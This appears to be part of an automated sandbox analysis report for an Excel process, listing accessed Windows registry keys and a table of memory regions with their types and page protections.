HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
0.11
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
ChunkCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
0.12
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
ChunkCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
0.13
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
ChunkCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
0.14
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
ChunkCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
0.15
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
0.16
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
ChunkCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
0.17
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
ChunkCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
0.18
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
ChunkCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
0.19
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
ChunkCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
0.20
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
ChunkCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
0.21
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
ChunkCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
0.22
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
ChunkCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
0.23
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
ChunkCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
0.24
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
ChunkCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
0.25
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
ChunkCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
0.26
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
ChunkCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
0.27
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
ChunkCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
VersionId
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel
Expires
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\EXCEL\7500
0
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\EXCEL\7500
0
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Roaming
RoamingConfigurableSettings
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Roaming
RoamingConfigurableSettings
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Roaming
RoamingLastSyncTimeExcel
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Roaming
RoamingLastWriteTimeExcel
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Excel\File MRU
Item 1
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Excel\File MRU
Item 2
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Excel\File MRU
Item 3
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Excel\File MRU
Item 4
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Excel\File MRU
Item 5
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Excel\File MRU
Item 6
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Excel\File MRU
Item 7
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Excel\File MRU
Item 8
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Excel\File MRU
Item 9
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Excel\File MRU
Item 10
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Excel\File MRU
Item 11
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Excel\File MRU
Item 12
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Excel\File MRU
Item 13
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Excel\File MRU
Item 14
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Excel\File MRU
Item 15
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Excel\File MRU
Item 16
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Excel\File MRU
Item 17
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Excel\File MRU
Item 18
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Excel\File MRU
Item 19
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Excel\File MRU
Item 20
HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{2B379600-B42B-4FE9-A59C-A312FB934935}
DeviceTicket
HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{2B379600-B42B-4FE9-A59C-A312FB934935}
DeviceId
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Excel\Security\Trusted Documents
LastPurgeTime
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified
excel.exe_queried
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified
excel.exe_queried
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
PerfMMFileName
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\splwow64.exe
JScriptSetScriptStateStarted
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\splwow64.exe
JScriptSetScriptStateStarted
There are 346 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
4AD0000
heap
page read and write
E1D01FE000
unkown
page readonly
A9B000
heap
page read and write
A3E000
heap
page read and write
2AB2F0FC000
heap
page read and write
AD0000
heap
page read and write
7FB0000
trusted library allocation
page read and write
2AB332B0000
trusted library allocation
page read and write
E1CFE7E000
stack
page read and write
A5E000
heap
page read and write
4BCE000
stack
page read and write
48D4000
heap
page read and write
E1CFB7E000
stack
page read and write
72EC000
heap
page read and write
7336000
heap
page read and write
770B000
stack
page read and write
36A0000
trusted library allocation
page execute and read and write
5D5D000
heap
page read and write
5E8E000
stack
page read and write
7328000
heap
page read and write
7B5B000
heap
page read and write
2AB2DC22000
heap
page read and write
B0A000
heap
page read and write
A62000
heap
page read and write
2AB333B0000
remote allocation
page read and write
2AB2EA80000
trusted library section
page readonly
5D5D000
heap
page read and write
5D4E000
heap
page read and write
E1D00FE000
unkown
page readonly
52DE000
stack
page read and write
341D000
heap
page read and write
7EE0000
trusted library allocation
page read and write
5D9E000
heap
page read and write
7B10000
heap
page read and write
2C87000
heap
page read and write
A93000
heap
page read and write
2AB33304000
trusted library allocation
page read and write
5D67000
heap
page read and write
E1CF0FE000
stack
page read and write
3634000
trusted library allocation
page read and write
ADF000
heap
page read and write
2CD7000
trusted library allocation
page execute and read and write
2AB2DCB5000
heap
page read and write
A51000
heap
page read and write
AF8000
heap
page read and write
2AB33228000
trusted library allocation
page read and write
A82000
heap
page read and write
96D000
stack
page read and write
A9C000
heap
page read and write
2CD2000
trusted library allocation
page read and write
2D00000
heap
page readonly
5D7A000
heap
page read and write
5FA0000
heap
page read and write
7E10000
trusted library allocation
page execute and read and write
2AB2F10A000
heap
page read and write
7CF0000
trusted library allocation
page read and write
2AB332B3000
trusted library allocation
page read and write
781E000
stack
page read and write
3650000
trusted library allocation
page read and write
4C65000
trusted library allocation
page read and write
72B0000
heap
page execute and read and write
5D9A000
heap
page read and write
2AB2E513000
heap
page read and write
6F5E000
stack
page read and write
2AB33240000
trusted library allocation
page read and write
4CA4000
heap
page read and write
5F90000
heap
page read and write
2AB33301000
trusted library allocation
page read and write
4C30000
trusted library allocation
page read and write
4C6D000
trusted library allocation
page read and write
4C40000
heap
page read and write
6017000
heap
page read and write
DB0000
heap
page read and write
5D5D000
heap
page read and write
2AB3321E000
trusted library allocation
page read and write
2AB2F058000
heap
page read and write
E1CF4F9000
stack
page read and write
E1CF7FE000
unkown
page readonly
2AB2F102000
heap
page read and write
7F220000
trusted library allocation
page execute and read and write
2CB0000
trusted library allocation
page read and write
6017000
heap
page read and write
5FCC000
heap
page read and write
5DBF000
heap
page read and write
7AE5000
heap
page read and write
72FC000
heap
page read and write
DD6000
heap
page read and write
8CED000
stack
page read and write
AF5000
heap
page read and write
2AB34000000
heap
page read and write
88C0000
trusted library allocation
page execute and read and write
2AB332F0000
trusted library allocation
page read and write
AB5000
heap
page read and write
2AB2E3C1000
trusted library allocation
page read and write
7AA3000
heap
page read and write
340F000
heap
page read and write
5D69000
heap
page read and write
E1CF6FC000
stack
page read and write
5D9A000
heap
page read and write
5D7A000
heap
page read and write
2AB2E402000
heap
page read and write
646D000
stack
page read and write
2BA0000
heap
page read and write
5D44000
heap
page read and write
AE9000
heap
page read and write
34D0000
heap
page read and write
2D9C000
stack
page read and write
600D000
heap
page read and write
724E000
stack
page read and write
B0D000
heap
page read and write
2BDA000
heap
page read and write
7ABC000
heap
page read and write
2AB33200000
trusted library allocation
page read and write
33BE000
stack
page read and write
5D69000
heap
page read and write
8930000
trusted library allocation
page read and write
AA8000
heap
page read and write
2AB2E3E0000
trusted library allocation
page read and write
7B28000
heap
page read and write
2AB2DC41000
heap
page read and write
8D2E000
stack
page read and write
AE2000
heap
page read and write
A9B000
heap
page read and write
7F0000
heap
page read and write
AD9000
heap
page read and write
E1D0BFE000
unkown
page readonly
B0F000
heap
page read and write
A9B000
heap
page read and write
2AB2F047000
heap
page read and write
564B000
trusted library allocation
page read and write
5DBF000
heap
page read and write
E1D07FE000
unkown
page readonly
8DAE000
stack
page read and write
925000
heap
page read and write
D1E000
stack
page read and write
4A00000
heap
page read and write
74BD000
stack
page read and write
5D5E000
heap
page read and write
5D61000
heap
page read and write
5DC4000
heap
page read and write
5411000
trusted library allocation
page read and write
5DC8000
heap
page read and write
36B8000
heap
page read and write
2AB2F0C5000
heap
page read and write
A52000
heap
page read and write
A3F000
unkown
page read and write
74C0000
trusted library allocation
page read and write
57F7000
trusted library allocation
page read and write
AE5000
heap
page read and write
AE0000
heap
page read and write
7590000
trusted library allocation
page read and write
2CA4000
trusted library allocation
page read and write
2CB9000
trusted library allocation
page read and write
920000
heap
page read and write
2AB2DCA1000
heap
page read and write
48D0000
heap
page read and write
AC7000
heap
page read and write
355E000
stack
page read and write
2AB3327C000
trusted library allocation
page read and write
5D51000
heap
page read and write
5DBD000
heap
page read and write
7E60000
trusted library allocation
page read and write
AF1000
heap
page read and write
5D9A000
heap
page read and write
A28000
heap
page read and write
36B0000
heap
page read and write
6002000
heap
page read and write
768A000
stack
page read and write
7570000
trusted library allocation
page read and write
33E9000
heap
page read and write
2BA4000
heap
page read and write
2AB2DB70000
trusted library section
page read and write
701B000
stack
page read and write
2AB33211000
trusted library allocation
page read and write
7B14000
heap
page read and write
5D48000
heap
page read and write
2B5F000
stack
page read and write
779E000
stack
page read and write
4AA0000
heap
page read and write
89CE000
stack
page read and write
304E000
unkown
page read and write
4CA6000
trusted library allocation
page read and write
3690000
heap
page readonly
2AB2EA40000
trusted library section
page readonly
8A62000
trusted library allocation
page read and write
2AB2DC2B000
heap
page read and write
5DA6000
heap
page read and write
B05000
heap
page read and write
7ED0000
trusted library allocation
page read and write
7E40000
trusted library allocation
page read and write
7CA9000
trusted library allocation
page read and write
3630000
trusted library allocation
page read and write
AD0000
heap
page read and write
7E50000
trusted library allocation
page read and write
7DBE000
stack
page read and write
2F60000
heap
page read and write
4FA7000
heap
page read and write
2AB33225000
trusted library allocation
page read and write
32F0000
heap
page read and write
5FB1000
trusted library allocation
page read and write
AE4000
heap
page read and write
898D000
stack
page read and write
2E90000
heap
page read and write
73FE000
stack
page read and write
541F000
stack
page read and write
E1CFFFE000
unkown
page readonly
309B000
heap
page read and write
7560000
trusted library allocation
page read and write
57F9000
trusted library allocation
page read and write
600A000
heap
page read and write
2AB33370000
trusted library allocation
page read and write
2AB33266000
trusted library allocation
page read and write
3090000
heap
page read and write
5D85000
heap
page read and write
734B000
heap
page read and write
5D7A000
heap
page read and write
7E70000
trusted library allocation
page read and write
48D6000
heap
page read and write
E1CFF7E000
stack
page read and write
7550000
heap
page read and write
2AB2DCC0000
heap
page read and write
7530000
trusted library allocation
page read and write
7D7E000
stack
page read and write
5500000
trusted library allocation
page read and write
96A9000
heap
page read and write
3680000
trusted library allocation
page read and write
AE6000
heap
page read and write
5DC2000
heap
page read and write
7820000
heap
page read and write
9932000
trusted library allocation
page read and write
AF6000
heap
page read and write
5646000
trusted library allocation
page read and write
2AB2DC91000
heap
page read and write
743F000
stack
page read and write
6017000
heap
page read and write
AE7000
heap
page read and write
743E000
stack
page read and write
5CBD000
trusted library allocation
page read and write
5015000
trusted library allocation
page read and write
AF4000
heap
page read and write
5D69000
heap
page read and write
747E000
stack
page read and write
34BF000
stack
page read and write
5FA0000
heap
page read and write
5DBF000
heap
page read and write
98B0000
trusted library allocation
page read and write
5D4A000
heap
page read and write
2AB33210000
trusted library allocation
page read and write
2AB2F0E8000
heap
page read and write
E1CFC7E000
stack
page read and write
2AB2DC75000
heap
page read and write
2AB2DD02000
heap
page read and write
E1D05FE000
unkown
page readonly
B06000
heap
page read and write
A00000
heap
page read and write
2AB2DA30000
heap
page read and write
2AB2F200000
trusted library allocation
page read and write
4F4C000
stack
page read and write
AC7000
heap
page read and write
970000
heap
page read and write
2AB2F090000
heap
page read and write
2AB2E3F0000
trusted library allocation
page read and write
AE5000
heap
page read and write
96A6000
heap
page read and write
75CE000
stack
page read and write
6E9E000
stack
page read and write
6F9B000
stack
page read and write
AE4000
heap
page read and write
6E5E000
stack
page read and write
A9B000
heap
page read and write
3660000
trusted library allocation
page read and write
5D51000
heap
page read and write
A6F000
heap
page read and write
2EDC000
stack
page read and write
E1CF9FE000
unkown
page readonly
8B50000
trusted library allocation
page read and write
2AB2E51A000
heap
page read and write
A6F000
heap
page read and write
2F1E000
stack
page read and write
754D000
stack
page read and write
5D9A000
heap
page read and write
9694000
heap
page read and write
2AB2F0F7000
heap
page read and write
A6F000
heap
page read and write
77DE000
stack
page read and write
7355000
heap
page read and write
363D000
trusted library allocation
page execute and read and write
2AB2DC7A000
heap
page read and write
74BE000
stack
page read and write
E1D06FE000
stack
page read and write
2AB2E51A000
heap
page read and write
2AB2E415000
heap
page read and write
359E000
stack
page read and write
5DBD000
heap
page read and write
5241000
trusted library allocation
page read and write
2AB2DD13000
heap
page read and write
7E90000
trusted library allocation
page read and write
5D5D000
heap
page read and write
7A40000
trusted library allocation
page read and write
A93000
heap
page read and write
4A06000
heap
page read and write
2AB3332A000
trusted library allocation
page read and write
5F95000
heap
page read and write
7090000
heap
page read and write
720E000
stack
page read and write
7AC9000
heap
page read and write
6013000
heap
page read and write
AC2000
heap
page read and write
B0A000
heap
page read and write
4A03000
heap
page read and write
7FA0000
trusted library allocation
page read and write
A5F000
heap
page read and write
7DFD000
stack
page read and write
5DBD000
heap
page read and write
5D9B000
heap
page read and write
3662000
trusted library allocation
page read and write
5DC2000
heap
page read and write
4D31000
trusted library allocation
page read and write
5D5D000
heap
page read and write
54F0000
trusted library allocation
page read and write
A63000
heap
page read and write
3633000
trusted library allocation
page execute and read and write
2AB2DCE0000
heap
page read and write
5D7A000
heap
page read and write
7CB0000
trusted library allocation
page read and write
5DC0000
heap
page read and write
4C5C000
trusted library allocation
page read and write
531E000
stack
page read and write
3050000
heap
page read and write
2C9D000
stack
page read and write
5FBB000
heap
page read and write
6D4F000
stack
page read and write
E1CFA7E000
stack
page read and write
760E000
stack
page read and write
A93000
heap
page read and write
2AB33254000
trusted library allocation
page read and write
2AB2F104000
heap
page read and write
5D42000
heap
page read and write
2AB33340000
trusted library allocation
page read and write
8D6E000
stack
page read and write
2BB0000
heap
page read and write
AC7000
heap
page read and write
2AB2EA60000
trusted library section
page readonly
30A3000
heap
page read and write
4D25000
trusted library allocation
page read and write
5C79000
trusted library allocation
page read and write
5DB4000
heap
page read and write
AEA000
heap
page read and write
4E9E000
stack
page read and write
A52000
heap
page read and write
ADF000
heap
page read and write
600A000
heap
page read and write
2B60000
heap
page read and write
5D85000
heap
page read and write
9C0000
trusted library allocation
page read and write
35E0000
heap
page read and write
5D59000
heap
page read and write
E1CF8FB000
stack
page read and write
E1CE93B000
stack
page read and write
2F6B000
heap
page read and write
E1CFAFE000
unkown
page readonly
3649000
trusted library allocation
page read and write
6002000
heap
page read and write
800000
heap
page read and write
5056000
trusted library allocation
page read and write
91D000
stack
page read and write
98B4000
trusted library allocation
page read and write
2AB33282000
trusted library allocation
page read and write
2CA0000
trusted library allocation
page read and write
7B60000
heap
page read and write
AD2000
heap
page read and write
600E000
heap
page read and write
5D69000
heap
page read and write
2C34000
heap
page read and write
AB5000
heap
page read and write
2AB33218000
trusted library allocation
page read and write
5F8F000
stack
page read and write
4F80000
heap
page read and write
8A05000
trusted library allocation
page read and write
AB5000
heap
page read and write
5D41000
heap
page read and write
2AB3330C000
trusted library allocation
page read and write
4C87000
trusted library allocation
page read and write
7A70000
heap
page read and write
636C000
stack
page read and write
AC4000
heap
page read and write
7580000
trusted library allocation
page read and write
5FBB000
heap
page read and write
3665000
trusted library allocation
page execute and read and write
2AB2DB60000
trusted library allocation
page read and write
323C000
stack
page read and write
A72000
heap
page read and write
5DC8000
heap
page read and write
4EF8000
trusted library allocation
page read and write
365A000
trusted library allocation
page execute and read and write
2AB2DC28000
heap
page read and write
4F50000
trusted library allocation
page read and write
2D19000
heap
page read and write
600A000
heap
page read and write
2CF0000
trusted library allocation
page read and write
601C000
trusted library allocation
page read and write
E1CF5FE000
unkown
page readonly
5DBF000
heap
page read and write
B11000
heap
page read and write
2AB2DC7C000
heap
page read and write
7E20000
trusted library allocation
page read and write
2AB2DC7F000
heap
page read and write
351E000
stack
page read and write
519E000
stack
page read and write
E1D017E000
stack
page read and write
5D40000
heap
page read and write
ADF000
heap
page read and write
74E0000
trusted library allocation
page read and write
2AB33240000
trusted library allocation
page read and write
354B000
heap
page read and write
2BE8000
heap
page read and write
AF9000
heap
page read and write
5D9A000
heap
page read and write
2C2E000
heap
page read and write
2CA3000
trusted library allocation
page execute and read and write
2AB2EA90000
trusted library section
page readonly
5FAE000
heap
page read and write
5FAE000
heap
page read and write
5D69000
heap
page read and write
5D59000
heap
page read and write
5DC4000
heap
page read and write
5FF0000
heap
page read and write
AD0000
heap
page read and write
52F6000
trusted library allocation
page read and write
7E00000
trusted library allocation
page read and write
B0D000
heap
page read and write
4727000
heap
page read and write
E1CEEF7000
stack
page read and write
5F96000
heap
page read and write
AF2000
heap
page read and write
3620000
trusted library allocation
page read and write
2AB3327F000
trusted library allocation
page read and write
5DBD000
heap
page read and write
5DBF000
heap
page read and write
5DBF000
heap
page read and write
540F000
trusted library allocation
page read and write
8A50000
trusted library allocation
page read and write
2AB332E0000
trusted library allocation
page read and write
5D61000
heap
page read and write
A5B000
heap
page read and write
4C0E000
stack
page read and write
A82000
heap
page read and write
6FDE000
stack
page read and write
901C000
stack
page read and write
2AB3329E000
trusted library allocation
page read and write
73AE000
stack
page read and write
5DC8000
heap
page read and write
AF4000
heap
page read and write
795E000
stack
page read and write
2AB2DC96000
heap
page read and write
75C0000
trusted library allocation
page execute and read and write
6DDD000
stack
page read and write
72F2000
heap
page read and write
74F0000
trusted library allocation
page read and write
5D67000
heap
page read and write
5DBD000
heap
page read and write
2AB2DCED000
heap
page read and write
5DBD000
heap
page read and write
8A60000
trusted library allocation
page read and write
74D0000
trusted library allocation
page execute and read and write
E1CEFFE000
unkown
page readonly
2AB2DCB1000
heap
page read and write
5108000
trusted library allocation
page read and write
30BD000
heap
page read and write
2F30000
trusted library allocation
page read and write
AC9000
heap
page read and write
E1CFCFE000
unkown
page readonly
733C000
heap
page read and write
3640000
trusted library allocation
page read and write
5D9A000
heap
page read and write
2AB332A1000
trusted library allocation
page read and write
2AB33317000
trusted library allocation
page read and write
2AB332D2000
trusted library allocation
page read and write
6E1B000
stack
page read and write
A94000
heap
page read and write
5D69000
heap
page read and write
B0F000
heap
page read and write
2AB333B0000
remote allocation
page read and write
2AB2EA70000
trusted library section
page readonly
73EE000
stack
page read and write
729000
stack
page read and write
48DF000
heap
page read and write
5D50000
heap
page read and write
5C51000
trusted library allocation
page read and write
E1D007E000
stack
page read and write
2AB33230000
trusted library allocation
page read and write
7540000
trusted library allocation
page read and write
7C80000
trusted library allocation
page read and write
5DB4000
heap
page read and write
5D46000
heap
page read and write
8A4E000
stack
page read and write
5697000
trusted library allocation
page read and write
4D5D000
trusted library allocation
page read and write
A6F000
heap
page read and write
2AB33360000
trusted library allocation
page read and write
ABE000
heap
page read and write
7308000
heap
page read and write
3439000
heap
page read and write
ADF000
heap
page read and write
2AB2EFF0000
trusted library allocation
page read and write
7E80000
trusted library allocation
page read and write
5D85000
heap
page read and write
2AB3330F000
trusted library allocation
page read and write
ACB000
heap
page read and write
49A000
stack
page read and write
4B85000
heap
page execute and read and write
73F0000
heap
page execute and read and write
2AB332E0000
trusted library allocation
page read and write
A58000
heap
page read and write
5DBD000
heap
page read and write
7500000
trusted library allocation
page read and write
52C7000
trusted library allocation
page read and write
4D34000
trusted library allocation
page read and write
4C20000
heap
page execute and read and write
600A000
heap
page read and write
6F1A000
stack
page read and write
2AB333B0000
remote allocation
page read and write
88E0000
trusted library allocation
page read and write
775E000
stack
page read and write
5D85000
heap
page read and write
AC7000
heap
page read and write
2AB2F0F2000
heap
page read and write
2AB2E500000
heap
page read and write
E1CF2FB000
stack
page read and write
2CD0000
trusted library allocation
page read and write
57F3000
trusted library allocation
page read and write
5D69000
heap
page read and write
4FA0000
heap
page read and write
2AB2DC13000
heap
page read and write
76CE000
stack
page read and write
7E30000
trusted library allocation
page read and write
75B0000
trusted library allocation
page read and write
7EC0000
trusted library allocation
page read and write
8940000
heap
page read and write
2AB2F0FA000
heap
page read and write
C1F000
stack
page read and write
88D0000
trusted library allocation
page read and write
4FB1000
trusted library allocation
page read and write
2AB2F000000
heap
page read and write
4EF0000
trusted library allocation
page read and write
7AED000
heap
page read and write
E1CF1FE000
unkown
page readonly
8FDB000
stack
page read and write
7A0000
heap
page read and write
337F000
unkown
page read and write
5413000
trusted library allocation
page read and write
8910000
heap
page read and write
7CA0000
trusted library allocation
page read and write
A6F000
heap
page read and write
34A1000
heap
page read and write
2AB33360000
trusted library allocation
page read and write
8B4E000
stack
page read and write
4710000
heap
page read and write
5D7A000
heap
page read and write
AB5000
heap
page read and write
6017000
heap
page read and write
4CA0000
heap
page read and write
4EB8000
trusted library allocation
page read and write
72C0000
heap
page read and write
5FB9000
trusted library allocation
page read and write
2B90000
trusted library allocation
page read and write
4CC3000
trusted library allocation
page read and write
61A0000
trusted library allocation
page read and write
A93000
heap
page read and write
7D3E000
stack
page read and write
7EB0000
trusted library allocation
page read and write
799B000
stack
page read and write
7B0B000
heap
page read and write
2CD5000
trusted library allocation
page execute and read and write
7A78000
heap
page read and write
736E000
stack
page read and write
2CAD000
trusted library allocation
page execute and read and write
32C0000
heap
page read and write
6EDD000
stack
page read and write
764E000
stack
page read and write
5DBF000
heap
page read and write
AA9000
heap
page read and write
2AB33250000
trusted library allocation
page read and write
5D69000
heap
page read and write
2AB2DA50000
heap
page read and write
32D0000
heap
page read and write
A730000
heap
page read and write
5D7A000
heap
page read and write
500C000
trusted library allocation
page read and write
2AB332F5000
trusted library allocation
page read and write
5D52000
heap
page read and write
A20000
heap
page read and write
728E000
stack
page read and write
5D7A000
heap
page read and write
DD0000
heap
page read and write
30BD000
heap
page read and write
AE5000
heap
page read and write
E1D04FD000
stack
page read and write
2AB2F092000
heap
page read and write
7EA0000
trusted library allocation
page read and write
5567000
trusted library allocation
page read and write
5DC8000
heap
page read and write
7338000
heap
page read and write
5DBD000
heap
page read and write
2E6E000
stack
page read and write
5DC0000
heap
page read and write
7510000
trusted library allocation
page read and write
2AB2DCA3000
heap
page read and write
4EEE000
stack
page read and write
2AB2F05C000
heap
page read and write
5D69000
heap
page read and write
7B82000
heap
page read and write
A82000
heap
page read and write
E1CF3FE000
unkown
page readonly
AB5000
heap
page read and write
2F20000
trusted library allocation
page execute and read and write
2AB2F0E1000
heap
page read and write
33E0000
heap
page read and write
A9B000
heap
page read and write
6FEE000
stack
page read and write
6EB000
stack
page read and write
734E000
heap
page read and write
A3E000
heap
page read and write
5DC8000
heap
page read and write
2AB332F8000
trusted library allocation
page read and write
35DE000
stack
page read and write
AC4000
heap
page read and write
5DBF000
heap
page read and write
599000
stack
page read and write
2AB2EA50000
trusted library section
page readonly
2AB2E502000
heap
page read and write
2AB2E601000
trusted library allocation
page read and write
34A5000
heap
page read and write
4EA0000
heap
page execute and read and write
4D28000
trusted library allocation
page read and write
72D000
stack
page read and write
5D85000
heap
page read and write
7C70000
heap
page read and write
4C9B000
stack
page read and write
7B06000
heap
page read and write
2AB33274000
trusted library allocation
page read and write
5DC2000
heap
page read and write
72F0000
heap
page read and write
8B60000
trusted library allocation
page read and write
E1CFEFE000
unkown
page readonly
7A47000
trusted library allocation
page read and write
7A50000
heap
page execute and read and write
9670000
heap
page read and write
8920000
trusted library allocation
page execute and read and write
5DBD000
heap
page read and write
6CCF000
stack
page read and write
6D0E000
stack
page read and write
526D000
trusted library allocation
page read and write
7520000
trusted library allocation
page read and write
5DC1000
heap
page read and write
2AB332CA000
trusted library allocation
page read and write
5D9A000
heap
page read and write
2AB33350000
trusted library allocation
page read and write
4B80000
heap
page execute and read and write
2D10000
heap
page read and write
ADF000
heap
page read and write
51DD000
stack
page read and write
5315000
trusted library allocation
page read and write
6C8E000
stack
page read and write
2AB2DC5D000
heap
page read and write
2AB3325D000
trusted library allocation
page read and write
34AE000
heap
page read and write
2AB2DC00000
heap
page read and write
2AB33210000
trusted library allocation
page read and write
73F5000
heap
page execute and read and write
32F6000
heap
page read and write
31A0000
heap
page read and write
7B25000
heap
page read and write
7AE8000
heap
page read and write
7EE000
unkown
page read and write
75A0000
trusted library allocation
page read and write
2AB2EB80000
trusted library allocation
page read and write
A9E000
stack
page read and write
6017000
heap
page read and write
6017000
heap
page read and write
4F46000
trusted library allocation
page read and write
747E000
stack
page read and write
E1CFBFE000
unkown
page readonly
E1D0B7E000
stack
page read and write
2AB2E940000
trusted library allocation
page read and write
AB5000
heap
page read and write
2E2E000
stack
page read and write
7ADE000
heap
page read and write
3000000
heap
page read and write
7B21000
heap
page read and write
A82000
heap
page read and write
6002000
heap
page read and write
600A000
heap
page read and write
71CE000
stack
page read and write
AB5000
heap
page read and write
DDA000
heap
page read and write
2AB2F0CD000
heap
page read and write
AE4000
heap
page read and write
5D9A000
heap
page read and write
758B000
stack
page read and write
5FBC000
heap
page read and write
AE4000
heap
page read and write
2AB2E400000
heap
page read and write
AE4000
heap
page read and write
